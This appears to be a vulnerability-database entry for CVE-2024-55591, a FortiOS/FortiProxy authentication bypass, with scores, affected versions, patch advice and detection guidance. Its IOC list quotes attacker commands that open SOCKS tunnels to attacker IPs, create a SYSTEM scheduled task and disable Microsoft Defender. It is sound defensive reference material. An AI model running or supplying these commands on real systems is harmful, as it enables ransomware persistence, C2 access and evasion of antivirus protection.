cbcvebase.
CVE-2024-55591
published 2025-01-14

CVE-2024-55591: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-01-21
Exploited in the wild
EPSS
94.15%
99.8th percentile
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.

Affected

8 ranges
VendorProductVersion rangeFixed in
fortinetfortios——
fortinetfortios>= 7.0.0 < 7.0.177.0.17
fortinetfortios7.0.0 – 7.0.16—
fortinetfortiproxy——
fortinetfortiproxy>= 7.0.0 < 7.0.207.0.20
fortinetfortiproxy7.0.0 – 7.0.19—
fortinetfortiproxy>= 7.2.0 < 7.2.137.2.13
fortinetfortiproxy7.2.0 – 7.2.12—

Detection & IOCsextracted from sources · hover to see the quote

ip193.233.202[.]17↗
port44729↗
ip77.110.122[.]137↗
port37182↗
filenamesvchost32.exe↗
filenamewin.exe↗
filenameREADME-GENTLEMEN.txt↗
pathC:\Windows\Temp\svchost32.exe↗
pathC:\Windows\Temp\RbHoNVNU.tmp↗
commandC:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks↗
commandcmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1↗
commandpowershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled↗
commandpowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force↗
commandpowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled -Force↗
commandpowershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force↗
commandpowershell -Command Add-MpPreference -ExclusionPath C:\ -Force↗
other.fjn1jw↗
otherforticloud-tech↗
otherfortigate-firewall↗
otheradnimistrator↗
commandwin.exe --password REDACTED --T 200 --superfast↗
  • →Detect exploitation of CVE-2024-55591 via WebSocket-based attacks: attackers gain super_admin privileges through the jsconsole interface or direct HTTPS requests to exposed firewall management interfaces using the Node.js websocket module. ↗
  • →Alert on creation of rogue local/admin accounts on FortiGate devices, especially accounts named forticloud-tech, fortigate-firewall, or adnimistrator, which are indicators of post-exploitation activity following CVE-2024-55591 abuse. ↗
  • →Monitor for unauthorized administrative logins on FortiGate management interfaces, creation of new SSL VPN accounts, and SSL VPN authentication through rogue accounts as indicators of CVE-2024-55591 exploitation. ↗
  • →Alert on jsconsole usage on FortiGate devices as a common thread across CVE-2024-55591 exploitation intrusions. ↗
  • →Detect Scheduled Task creation with the name 'WindowsConnSvc' or tasks executing binaries from C:\Windows\Temp\ that establish SOCKS proxy connections to external IPs, indicative of The Gentlemen ransomware C2 persistence. ↗
  • →Create immediate, high-severity SIEM alerts for the creation, deletion or execution of any scheduled task matching the string gentlemen*. ↗
  • →Alert on Windows Event ID 104 (Application/System log cleared) and Event ID 1102 (Security log cleared) in combination, as The Gentlemen threat actors specifically clear Security, System, and Application logs post-compromise. ↗
  • →Detect Microsoft Defender detections for Trojan:Win32/MpTamperBulkExcl.H, which indicates a PowerShell script attempting to tamper with antivirus exclusions, observed in The Gentlemen ransomware attacks. ↗
  • →Monitor for ransomware encryptors executed from the NETLOGON share by the SYSTEM account via CcmExec.exe (Configuration Manager Client), a lateral movement technique observed in The Gentlemen attacks. ↗
  • →Monitor for anomalous outbound traffic over non-standard ports or traffic matching known SystemBC communication signatures, as used by The Gentlemen ransomware for C2. ↗
  • →Implement behavioral alerts for systems executing wevtutil to clear Security/System logs, a technique observed in The Gentlemen ransomware attacks. ↗
  • →Monitor for the CVE-2024-55591 exploitation timeline phases: vulnerability scanning (Nov 16–23, 2024), reconnaissance (Nov 22–27, 2024), SSL VPN configuration (Dec 4–7, 2024), and lateral movement (Dec 16–27, 2024). ↗
  • ·CVE-2024-55591 affects FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12. Patched versions are FortiOS 7.0.17+ and FortiProxy 7.0.20/7.2.13+. If previously upgraded per FG-IR-24-535 guidance, devices are also protected against the related CVE-2025-24472. ↗
  • ·As a workaround when patching is not immediately possible, disable the HTTP/HTTPS administrative interface or limit IP addresses that can reach it via local-in policies. ↗
  • ·CVE-2024-55591 was exploited as a zero-day in attacks since at least mid-November 2024, before Fortinet's public disclosure on January 14, 2025. Organizations should audit for indicators of prior exploitation even if patched. ↗
  • ·The Gentlemen ransomware group maintains a stockpile of approximately 14,700 pre-exploited FortiGate devices via CVE-2024-55591, plus 969 validated brute-forced FortiGate VPN credentials, meaning exploitation may have occurred long before any active attack is detected. ↗

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.